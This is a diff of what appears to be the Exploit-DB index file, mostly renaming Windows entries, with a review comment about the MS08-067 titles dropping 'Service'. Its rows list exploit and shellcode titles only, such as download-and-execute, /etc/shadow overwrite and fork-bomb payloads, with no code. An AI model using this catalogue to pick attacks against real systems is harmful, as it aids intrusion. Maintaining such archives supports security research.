 6461,platforms/php/webapps/6461.txt,"Cpanel <= 11.x (Fantastico) LFI Vulnerability (sec bypass)",2008-09-14,joker_1,php,webapps,0
 6462,platforms/php/webapps/6462.pl,"CzarNews <= 1.20 (Cookie) Remote SQL Injection Exploit",2008-09-15,StAkeR,php,webapps,0
-6463,platforms/windows/dos/6463.rb,"MS Windows WRITE_ANDX SMB command handling Kernel DoS (meta)",2008-09-15,"Javier Vicente Vallejo",windows,dos,0
+6463,platforms/windows/dos/6463.rb,"Microsoft Windows - WRITE_ANDX SMB command handling Kernel DoS (meta)",2008-09-15,"Javier Vicente Vallejo",windows,dos,0
 6464,platforms/php/webapps/6464.txt,"CzarNews <= 1.20 (Account Hijacking) Remote SQL Injection Vuln",2008-09-15,0ut0fbound,php,webapps,0
 6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings (search.php c) SQL Injection Vulnerability",2008-09-15,JosS,php,webapps,0
 6466,platforms/php/webapps/6466.txt,"Link Bid Script 1.5 - Multiple Remote SQL Injection Vulnerabilities",2008-09-15,SirGod,php,webapps,0
@@ -6130,7 +6130,7 @@ id,file,description,date,author,platform,type,port
 6557,platforms/php/webapps/6557.txt,"ADN Forum <= 1.0b Insecure Cookie Handling Vulnerability",2008-09-24,Pepelux,php,webapps,0
 6558,platforms/php/webapps/6558.txt,"barcodegen <= 2.0.0 - Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0
 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0
-6560,platforms/windows/dos/6560.txt,"MS Windows Wordpad .doc File Local Denial of Service PoC",2008-09-25,securfrog,windows,dos,0
+6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad .doc File Local Denial of Service PoC",2008-09-25,securfrog,windows,dos,0
 6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - (seller_id) SQL Injection Vulnerability",2008-09-25,InjEctOr5,php,webapps,0
 6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 (design) Local File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0
 6563,platforms/php/webapps/6563.txt,"phpOCS <= 0.1-beta3 (index.php act) Local File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0
@@ -6158,7 +6158,7 @@ id,file,description,date,author,platform,type,port
 6585,platforms/php/webapps/6585.txt,"openengine 2.0 beta2 - Remote File Inclusion Vulnerability",2008-09-26,Crackers_Child,php,webapps,0
 6586,platforms/php/webapps/6586.txt,"Crux Gallery <= 1.32 Insecure Cookie Handling Vulnerability",2008-09-26,Pepelux,php,webapps,0
 6587,platforms/php/webapps/6587.txt,"The Gemini Portal (lang) Remote File Inclusion Vulnerabilities",2008-09-26,ZoRLu,php,webapps,0
-6588,platforms/windows/dos/6588.txt,"MS Windows GDI+ (.ico File) Remote Division By Zero Exploit",2008-09-26,"laurent gaffié ",windows,dos,0
+6588,platforms/windows/dos/6588.txt,"Microsoft Windows GDI+ - (.ico File) Remote Division By Zero Exploit",2008-09-26,"laurent gaffié ",windows,dos,0
 6589,platforms/php/webapps/6589.txt,"RPG.Board <= 0.0.8Beta2 (showtopic) SQL Injection Vulnerability",2008-09-26,0x90,php,webapps,0
 6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability",2008-09-27,Crackers_Child,php,webapps,0
 6591,platforms/php/webapps/6591.txt,"RPG.Board <= 0.0.8Beta2 Insecure Cookie Handling Vulnerability",2008-09-27,Stack,php,webapps,0
@@ -6185,7 +6185,7 @@ id,file,description,date,author,platform,type,port
 6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining (news_read.php id) SQL Injection Vulnerability",2008-09-28,S.W.A.T.,php,webapps,0
 6614,platforms/windows/dos/6614.html,"Mozilla Firefox 3.0.3 User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",windows,dos,0
 6615,platforms/windows/dos/6615.html,"Opera 9.52 Window Object Suppressing Remote Denial of Service Exploit",2008-09-28,"Aditya K Sood",windows,dos,0
-6616,platforms/windows/dos/6616.txt,"MS Windows Explorer Unspecified .ZIP File Denial of Service Exploit",2008-09-28,"fl0 fl0w",windows,dos,0
+6616,platforms/windows/dos/6616.txt,"Microsoft Windows - Explorer Unspecified .ZIP File Denial of Service Exploit",2008-09-28,"fl0 fl0w",windows,dos,0
 6617,platforms/php/webapps/6617.txt,"BbZL.PhP 0.92 (lien_2) Local Directory Traversal Vulnerability",2008-09-28,JIKO,php,webapps,0
 6618,platforms/php/webapps/6618.txt,"joomla component imagebrowser <= 0.1.5 rc2 - Directory Traversal vuln",2008-09-28,Cr@zy_King,php,webapps,0
 6619,platforms/windows/dos/6619.html,"MS Internet Explorer GDI+ - Proof of Concept (MS08-052)",2008-09-28,"John Smith",windows,dos,0
@@ -6224,7 +6224,7 @@ id,file,description,date,author,platform,type,port
 6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 (infile) Local File Inclusion Vulnerability",2008-10-02,ZeN,php,webapps,0
 6654,platforms/windows/dos/6654.pl,"mIRC 6.34 Remote Buffer Overflow PoC",2008-10-02,securfrog,windows,dos,0
 6655,platforms/php/webapps/6655.php,"OpenX 2.6 (ac.php bannerid) Remote Blind SQL Injection Exploit",2008-10-02,d00m3r4ng,php,webapps,0
-6656,platforms/windows/remote/6656.txt,"MS Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0
+6656,platforms/windows/remote/6656.txt,"Microsoft Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0
 6657,platforms/php/webapps/6657.pl,"IP Reg <= 0.4 - Remote Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0
 6658,platforms/windows/dos/6658.txt,"VBA32 Personal Antivirus 3.12.8.x (malformed archive) DoS Exploit",2008-10-03,LiquidWorm,windows,dos,0
 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script (arsaprint.php id) SQL Injection Vulnerability",2008-10-03,"Hussin X",php,webapps,0
@@ -6238,7 +6238,7 @@ id,file,description,date,author,platform,type,port
 6668,platforms/windows/dos/6668.txt,"AyeView 2.20 (malformed gif image) Local Crash Exploit",2008-10-04,suN8Hclf,windows,dos,0
 6669,platforms/php/webapps/6669.txt,"JMweb Multiple (src) Local File Inclusion Vulnerabilities",2008-10-04,SirGod,php,webapps,0
 6670,platforms/php/webapps/6670.txt,"FOSS Gallery Admin <= 1.0 - Remote Arbitrary Upload Exploit",2008-10-04,Pepelux,php,webapps,0
-6671,platforms/windows/dos/6671.c,"MS Windows Vista Access Violation from Limited Account Exploit (BSoD)",2008-10-04,Defsanguje,windows,dos,0
+6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista Access Violation from Limited Account Exploit (BSoD)",2008-10-04,Defsanguje,windows,dos,0
 6672,platforms/windows/dos/6672.txt,"AyeView 2.20 (invalid bitmap header parsing) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0
 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 (malformed bmp image) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0
 6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit",2008-10-05,JosS,php,webapps,0
@@ -6271,7 +6271,7 @@ id,file,description,date,author,platform,type,port
 6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 (campaignId) SQL Injection Vulnerability",2008-10-08,SuB-ZeRo,php,webapps,0
 6703,platforms/php/webapps/6703.txt,"WebBiscuits Modules Controller <= 1.1 (RFI/RFD) Remote Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0
 6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0
-6705,platforms/windows/local/6705.txt,"MS Windows 2003 Token Kidnapping Local Exploit PoC",2008-10-08,"Cesar Cerrudo",windows,local,0
+6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit PoC",2008-10-08,"Cesar Cerrudo",windows,local,0
 6706,platforms/php/webapps/6706.php,"Kusaba <= 1.0.4 - Remote Code Execution Exploit",2008-10-09,Sausage,php,webapps,0
 6707,platforms/php/webapps/6707.txt,"Gforge <= 4.5.19 Multiple Remote SQL Injection Vulnerabilities",2008-10-09,beford,php,webapps,0
 6708,platforms/php/webapps/6708.txt,"Gforge <= 4.6 rc1 (skill_edit) SQL Injection Vulnerability",2008-10-09,beford,php,webapps,0
@@ -6282,7 +6282,7 @@ id,file,description,date,author,platform,type,port
 6713,platforms/php/webapps/6713.txt,"ScriptsEz Mini Hosting Panel (members.php) LFI Vulnerability",2008-10-09,JosS,php,webapps,0
 6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 (SQL) User Credentials Disclosure Exploit",2008-10-09,gnix,php,webapps,0
 6715,platforms/php/webapps/6715.txt,"ScriptsEz Easy Image Downloader Local File Download Vulnerability",2008-10-09,JosS,php,webapps,0
-6716,platforms/windows/dos/6716.pl,"MS Windows GDI+ - Proof of Concept (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0
+6716,platforms/windows/dos/6716.pl,"Microsoft Windows GDI+ - Proof of Concept (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0
 6717,platforms/windows/dos/6717.py,"WinFTP 2.3.0 (PASV mode) Remote Denial of Service Exploit",2008-10-09,dmnt,windows,dos,0
 6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 (load) Remote Crash Vulnerability",2008-10-10,"Jeremy Brown",linux,dos,0
 6719,platforms/windows/dos/6719.py,"NoticeWare E-mail Server 5.1.2.2 (POP3) Pre-Auth DoS Exploit",2008-10-10,rAWjAW,windows,dos,0
@@ -6297,7 +6297,7 @@ id,file,description,date,author,platform,type,port
 6729,platforms/php/webapps/6729.php,"SlimCMS <= 1.0.0 (redirect.php) Privilege Escalation Exploit",2008-10-10,StAkeR,php,webapps,0
 6730,platforms/php/webapps/6730.txt,"Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0
 6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 (xlacomments.asp) SQL Injection Vuln",2008-10-11,Hakxer,asp,webapps,0
-6732,platforms/windows/dos/6732.txt,"MS Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0
+6732,platforms/windows/dos/6732.txt,"Microsoft Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0
 6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 (lfd/ce) Multiple Vulnerabilities",2008-10-12,muuratsalo,php,webapps,0
 6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure Vulnerabilities",2008-10-12,GoLd_M,php,webapps,0
 6735,platforms/php/webapps/6735.php,"Globsy <= 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0
@@ -6322,7 +6322,7 @@ id,file,description,date,author,platform,type,port
 6754,platforms/php/webapps/6754.txt,"My PHP Dating (success_story.php id) SQL Injection Vulnerability",2008-10-14,Hakxer,php,webapps,0
 6755,platforms/php/webapps/6755.php,"PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit",2008-10-14,EgiX,php,webapps,0
 6756,platforms/windows/dos/6756.txt,"VLC 0.9.2 Media Player XSPF Memory Corruption Vulnerability",2008-10-14,"Core Security",windows,dos,0
-6757,platforms/windows/local/6757.txt,"MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin)",2008-10-15,"Ruben Santamarta ",windows,local,0
+6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - AFD.sys Privilege Escalation Exploit (K-plugin)",2008-10-15,"Ruben Santamarta ",windows,local,0
 6758,platforms/php/webapps/6758.txt,"AstroSPACES (id) Remote SQL Injection Vulnerability",2008-10-15,TurkishWarriorr,php,webapps,0
 6759,platforms/php/webapps/6759.txt,"mystats (hits.php) Multiple Vulnerabilities exploit",2008-10-15,JosS,php,webapps,0
 6760,platforms/php/webapps/6760.txt,"myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability",2008-10-15,JosS,php,webapps,0
@@ -6387,7 +6387,7 @@ id,file,description,date,author,platform,type,port
 6821,platforms/php/webapps/6821.txt,"miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities",2008-10-23,StAkeR,php,webapps,0
 6822,platforms/php/webapps/6822.txt,"websvn <= 2.0 (xss/fh/ce) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0
 6823,platforms/php/webapps/6823.txt,"siteengine 5.x Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0
-6824,platforms/windows/dos/6824.txt,"MS Windows Server Service - Code Execution PoC (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
+6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution PoC (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
 6825,platforms/windows/local/6825.pl,"VLC 0.9.4 .TY File Buffer Overflow Exploit (SEH)",2008-10-23,"Guido Landi",windows,local,0
 6826,platforms/php/webapps/6826.txt,"joomla component archaic binary gallery 0.2 - Directory Traversal vuln",2008-10-24,H!tm@N,php,webapps,0
 6827,platforms/php/webapps/6827.txt,"Joomla Component Kbase 1.0 - Remote SQL Injection Vulnerability",2008-10-24,H!tm@N,php,webapps,0
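Review bot: The new title for 6824 drops the word "Service", so `Microsoft Windows Server - Code Execution PoC (MS08-067)` now reads as the Windows Server product rather than the Server service component named in the old title. The same rewrite is applied to 6841, 7104 and 7132 in the following hunks. Anyone searching the index by component, or using titles to scope which hosts an entry applies to, would likely mis-scope these rows. I would keep the component, as in `"Microsoft Windows Server Service - Code Execution PoC (MS08-067)"`. For 7132 the old title only said `2k/2k3`, so `Microsoft Windows 2000/2003 Server Service - ...` would preserve it without introducing `Windows Server 2000/2003`.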
@@ -6404,7 +6404,7 @@ id,file,description,date,author,platform,type,port
 6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service Exploit (meta)",2008-10-25,"Saint Patrick",windows,dos,0
 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions (gotourl.php id) SQL Injection Vuln",2008-10-26,"Hussin X",php,webapps,0
 6840,platforms/windows/remote/6840.html,"PowerTCP FTP module Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0
-6841,platforms/windows/remote/6841.txt,"MS Windows Server Service - Code Execution Exploit (MS08-067) (Univ)",2008-10-26,EMM,windows,remote,135
+6841,platforms/windows/remote/6841.txt,"Microsoft Windows Server - Code Execution Exploit (MS08-067) (Univ)",2008-10-26,EMM,windows,remote,135
 6842,platforms/php/webapps/6842.txt,"WordPress Media Holder (mediaHolder.php id) SQL Injection Vuln",2008-10-26,boom3rang,php,webapps,0
 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum (forum.php id) SQL Injection Vulnerability",2008-10-26,Hurley,php,webapps,0
 6844,platforms/php/webapps/6844.pl,"MyForum 1.3 (lecture.php id) Remote SQL Injection Exploit",2008-10-26,Vrs-hCk,php,webapps,0
@@ -6661,7 +6661,7 @@ id,file,description,date,author,platform,type,port
 7101,platforms/php/webapps/7101.txt,"AlstraSoft SendIt Pro Remote File Upload Vulnerability",2008-11-12,ZoRLu,php,webapps,0
 7102,platforms/php/webapps/7102.txt,"AlstraSoft Article Manager Pro (Auth Bypass) SQL Injection Vuln",2008-11-12,ZoRLu,php,webapps,0
 7103,platforms/php/webapps/7103.txt,"AlstraSoft Web Host Directory (Auth Bypass) SQL Injection Vuln",2008-11-12,ZoRLu,php,webapps,0
-7104,platforms/windows/remote/7104.c,"MS Windows Server Service - Code Execution Exploit (MS08-067)",2008-11-12,Polymorphours,windows,remote,135
+7104,platforms/windows/remote/7104.c,"Microsoft Windows Server - Code Execution Exploit (MS08-067)",2008-11-12,Polymorphours,windows,remote,135
 7105,platforms/php/webapps/7105.txt,"Quick Poll Script (code.php id) Remote SQL Injection Vulnerability",2008-11-12,"Hussin X",php,webapps,0
 7106,platforms/php/webapps/7106.txt,"turnkeyforms Local Classifieds Auth Bypass Vulnerability",2008-11-12,G4N0K,php,webapps,0
 7107,platforms/php/webapps/7107.txt,"turnkeyforms Web Hosting Directory Multiple Vulnerabilities",2008-11-12,G4N0K,php,webapps,0
@@ -6686,7 +6686,7 @@ id,file,description,date,author,platform,type,port
 7129,platforms/multiple/local/7129.sh,"Sudo <= 1.6.9p18 - (Defaults setenv) Local Privilege Escalation Exploit",2008-11-15,kingcope,multiple,local,0
 7130,platforms/php/webapps/7130.php,"Minigal b13 (index.php list) Remote File Disclosure Exploit",2008-11-15,"Alfons Luja",php,webapps,0
 7131,platforms/php/webapps/7131.txt,"yahoo answers (id) Remote SQL Injection Vulnerability",2008-11-16,snakespc,php,webapps,0
-7132,platforms/windows/remote/7132.py,"MS Windows Server Service - Code Execution Exploit (MS08-067) (2k/2k3)",2008-11-16,"Debasis Mohanty",windows,remote,445
+7132,platforms/windows/remote/7132.py,"Microsoft Windows Server 2000/2003 - Code Execution Exploit (MS08-067)",2008-11-16,"Debasis Mohanty",windows,remote,445
 7133,platforms/php/webapps/7133.txt,"FloSites Blog Multiple Remote SQL Injection Vulnerabilities",2008-11-16,Vrs-hCk,php,webapps,0
 7134,platforms/php/webapps/7134.txt,"phpstore Wholesale (track.php?id) SQL Injection Vulnerability",2008-11-16,"Hussin X",php,webapps,0
 7135,platforms/windows/local/7135.htm,"Opera 9.62 file:// Local Heap Overflow Exploit",2008-11-17,"Guido Landi",windows,local,0
@@ -7125,7 +7125,7 @@ id,file,description,date,author,platform,type,port
 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0
 7583,platforms/windows/remote/7583.pl,"MS Internet Explorer XML Parsing Buffer Overflow Exploit",2008-12-28,"Jeremy Brown",windows,remote,0
 7584,platforms/windows/remote/7584.pl,"Amaya Web Browser <= 11.0.1 - Remote Buffer Overflow Exploit (vista)",2008-12-28,SkD,windows,remote,0
-7585,platforms/windows/dos/7585.txt,"MS Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0
+7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0
 7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 (Auth Bypass) SQL Injection Vulnerability",2008-12-28,bizzit,php,webapps,0
 7587,platforms/php/webapps/7587.txt,"Joomla Component PAX Gallery 0.1 - Blind SQL Injection Vulnerability",2008-12-28,XaDoS,php,webapps,0
 7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client (.bps File) Local Stack Overflow PoC",2008-12-28,Stack,windows,dos,0
@@ -7257,7 +7257,7 @@ id,file,description,date,author,platform,type,port
 7717,platforms/php/webapps/7717.pl,"Joomla com_jashowcase (catid) Remote SQL Injection Exploit",2009-01-11,EcHoLL,php,webapps,0
 7718,platforms/php/webapps/7718.txt,"Joomla com_newsflash (id) Remote SQL Injection Vulnerability",2009-01-11,EcHoLL,php,webapps,0
 7719,platforms/php/webapps/7719.txt,"Fast Guest Book (Auth Bypass) SQL Injection Vulnerability",2009-01-11,Moudi,php,webapps,0
-7720,platforms/windows/dos/7720.pl,"MS Windows (.CHM File) Denial of Service (html compiled)",2009-01-11,securfrog,windows,dos,0
+7720,platforms/windows/dos/7720.pl,"Microsoft Windows - (.CHM File) Denial of Service (html compiled)",2009-01-11,securfrog,windows,dos,0
 7721,platforms/windows/dos/7721.pl,"Browse3D 3.5 (.sfs File) Local Buffer Overflow PoC",2009-01-11,Houssamix,windows,dos,0
 7722,platforms/php/webapps/7722.txt,"DZcms 3.1 (products.php pcat) Remote SQL Injection Vulnerability",2009-01-11,"Glafkos Charalambous ",php,webapps,0
 7723,platforms/php/webapps/7723.txt,"Seo4SMF for SMF forums Multiple Vulnerabilities",2009-01-11,WHK,php,webapps,0
@@ -7950,7 +7950,7 @@ id,file,description,date,author,platform,type,port
 8442,platforms/php/webapps/8442.txt,"Job2C (conf.inc) Config File Disclosure Vulnerability",2009-04-15,InjEctOr5,php,webapps,0
 8443,platforms/php/webapps/8443.txt,"Job2C 4.2 (adtype) Local File Inclusion Vulnerability",2009-04-15,ZoRLu,php,webapps,0
 8444,platforms/windows/local/8444.cpp,"Star Downloader Free <= 1.45 (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0
-8445,platforms/windows/dos/8445.pl,"MS Windows Media Player (.mid File) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0
+8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - (.mid File) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0
 8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability",2009-04-15,ahmadbady,php,webapps,0
 8447,platforms/windows/dos/8447.txt,"Zervit Webserver 0.02 Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0
 8448,platforms/php/webapps/8448.php,"Geeklog <= 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0
@@ -8772,7 +8772,7 @@ id,file,description,date,author,platform,type,port
 9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit (update)",2009-07-30,corelanc0d3r,windows,local,0
 9299,platforms/windows/local/9299.pl,"WINMOD 1.4 - (.lst) Local Stack Overflow Exploit XP SP3 (RET+SEH) (3)",2009-07-28,corelanc0d3r,windows,local,0
 9300,platforms/multiple/dos/9300.c,"ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC",2009-07-30,kingcope,multiple,dos,0
-9301,platforms/windows/local/9301.txt,"Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit",2009-07-30,"NT Internals",windows,local,0
+9301,platforms/windows/local/9301.txt,"Microsoft Windows XP - (win32k.sys) Local Privilege Escalation Exploit",2009-07-30,"NT Internals",windows,local,0
 9302,platforms/linux/local/9302.py,"Compface 1.1.5 (.xbm File) Local Buffer Overflow Exploit",2009-07-30,His0k4,linux,local,0
 9303,platforms/windows/remote/9303.c,"VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit",2009-07-30,"Pankaj Kohli",windows,remote,0
 9304,platforms/windows/dos/9304.txt,"Epiri Professional Web Browser 3.0 - Remote Crash Exploit",2009-07-30,LiquidWorm,windows,dos,0
@@ -8881,7 +8881,7 @@ id,file,description,date,author,platform,type,port
 9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH)",2009-08-11,ahwak2000,windows,local,0
 9413,platforms/php/webapps/9413.txt,"Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln",2009-08-11,kkr,php,webapps,0
 9416,platforms/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 (systemid) SQL Injection Vulnerability",2009-08-11,"Guilherme Marinheiro",php,webapps,0
-9417,platforms/windows/dos/9417.txt,"MS Windows 2003 (EOT File) BSOD Crash Exploit",2009-08-11,webDEViL,windows,dos,0
+9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - (EOT File) BSOD Crash Exploit",2009-08-11,webDEViL,windows,dos,0
 9418,platforms/windows/local/9418.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (2)",2009-08-11,"ThE g0bL!N",windows,local,0
 9419,platforms/php/webapps/9419.txt,"Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-08-12,"Pedro Laguna",php,webapps,0
 9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (3)",2009-08-12,hack4love,windows,local,0
@@ -11970,7 +11970,7 @@ id,file,description,date,author,platform,type,port
 13529,platforms/win32/shellcode/13529.c,"win xp/2000/2003 Download File and Exec 241 bytes",2004-10-25,lion,win32,shellcode,0
 13530,platforms/win32/shellcode/13530.asm,"windows/XP download and exec source",2004-09-26,"Peter Winter-Smith",win32,shellcode,0
 13531,platforms/win32/shellcode/13531.c,"windows/XP-sp1 portshell on port 58821 116 bytes",2004-09-26,silicon,win32,shellcode,0
-13532,platforms/win32/shellcode/13532.asm,"MS Windows (DCOM RPC2) Universal Shellcode",2003-10-09,N/A,win32,shellcode,0
+13532,platforms/win32/shellcode/13532.asm,"Microsoft Windows - (DCOM RPC2) Universal Shellcode",2003-10-09,N/A,win32,shellcode,0
 13533,platforms/win64/shellcode/13533.asm,"win64 (URLDownloadToFileA) download and execute 218+ bytes",2006-08-07,Weiss,win64,shellcode,0
 13548,platforms/lin_x86/shellcode/13548.asm,"linux/x86 kill all processes 9 bytes",2010-01-14,root@thegibson,lin_x86,shellcode,0
 13549,platforms/lin_x86/shellcode/13549.c,"Linux - setuid(0) & execve(""/sbin/poweroff -f"")",2009-12-04,ka0x,lin_x86,shellcode,0
@@ -12041,14 +12041,14 @@ id,file,description,date,author,platform,type,port 13712,platforms/linux/shellcode/13712.c,"Linux/x86 - Disable randomize stack addresse - 106 bytes",2010-05-25,"Jonathan Salwan",linux,shellcode,0 13715,platforms/linux/shellcode/13715.c,"Linux/x86 pwrite(""/etc/shadow"", hash, 32, 8) Shellcode 83",2010-05-27,agix,linux,shellcode,0 13716,platforms/linux/shellcode/13716.c,"Linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes",2010-05-27,agix,linux,shellcode,0 -13719,platforms/win64/shellcode/13719.txt,"Windows Seven Pro SP1 64 Fr (Beep) Shellcode 39 Bytes",2010-05-28,agix,win64,shellcode,0 +13719,platforms/win64/shellcode/13719.txt,"Windows 7 Pro SP1 64 Fr (Beep) Shellcode 39 Bytes",2010-05-28,agix,win64,shellcode,0 13722,platforms/linux/shellcode/13722.c,"linux/x86 Shellcode Polymorphic - setuid(0) + chmod(""/etc/shadow"", 0666) Shellcode 61 Bytes",2010-05-31,antrhacks,linux,shellcode,0 13723,platforms/linux/shellcode/13723.c,"change mode 0777 of ""/etc/shadow"" with sys_chmod syscall",2010-05-31,gunslinger_,linux,shellcode,0 13724,platforms/linux/shellcode/13724.c,"kill all running process x86/linux",2010-05-31,gunslinger_,linux,shellcode,0 13725,platforms/linux/shellcode/13725.txt,"change mode 0777 of ""/etc/passwd"" with sys_chmod syscall",2010-05-31,gunslinger_,linux,shellcode,0 13726,platforms/linux/shellcode/13726.txt,"45 bytes sys_execve(""/bin/sh"", ""-c"", ""reboot"") x86 linux shellcode",2010-05-31,gunslinger_,linux,shellcode,0 13728,platforms/linux/shellcode/13728.c,"39 bytes sys_setuid(0) & sys_setgid(0) & execve (""/bin/sh"") x86 linux shellcode",2010-06-01,gunslinger_,linux,shellcode,0 -13729,platforms/win64/shellcode/13729.txt,"Windows Seven x64 (cmd) Shellcode 61 Bytes",2010-06-01,agix,win64,shellcode,0 +13729,platforms/win64/shellcode/13729.txt,"Windows 7 x64 (cmd) Shellcode 61 Bytes",2010-06-01,agix,win64,shellcode,0 13730,platforms/linux/shellcode/13730.c,"33 bytes unlink ""/etc/shadow"" x86 linux 
shellcode",2010-06-02,gunslinger_,linux,shellcode,0 13731,platforms/linux/shellcode/13731.c,"x86 linux hard / unclean reboot (29 bytes)",2010-06-03,gunslinger_,linux,shellcode,0 13732,platforms/linux/shellcode/13732.c,"x86 linux hard / unclean reboot (33 bytes)",2010-06-03,gunslinger_,linux,shellcode,0 @@ -12735,7 +12735,7 @@ id,file,description,date,author,platform,type,port 14563,platforms/php/webapps/14563.html,"BXR 0.6.8 - CSRF Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14564,platforms/php/webapps/14564.html,"Amethyst 0.1.5 - XSS Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14565,platforms/php/webapps/14565.html,"DiamondList 0.1.6 - Cross Site Request Forgery Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -14566,platforms/windows/local/14566.c,"Microsoft Windows win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow",2010-08-06,Arkon,windows,local,0 +14566,platforms/windows/local/14566.c,"Microsoft Windows - win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow",2010-08-06,Arkon,windows,local,0 14569,platforms/php/webapps/14569.txt,"joomla component cgtestimonial 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0 14570,platforms/php/webapps/14570.txt,"Joomla Component com_neorecruit 1.4 - SQL Injection Vulnerability",2010-08-07,v3n0m,php,webapps,0 14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection Vulnerability",2010-08-07,Silic0n,php,webapps,0 
@@ -12769,7 +12769,7 @@ id,file,description,date,author,platform,type,port
 14608,platforms/windows/dos/14608.txt,"Microsoft Windows CreateWindow Function Callback Vulnerability (MS10-048)",2010-08-10,"Core Security",windows,dos,0
 14609,platforms/windows/dos/14609.py,"Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption (MS10-051)",2010-08-10,Skylined,windows,dos,0
 14610,platforms/windows/local/14610.txt,"Microsoft Windows Tracing Registry Key ACL Privilege Escalation Vulnerability",2010-08-10,"Cesar Cerrudo",windows,local,0
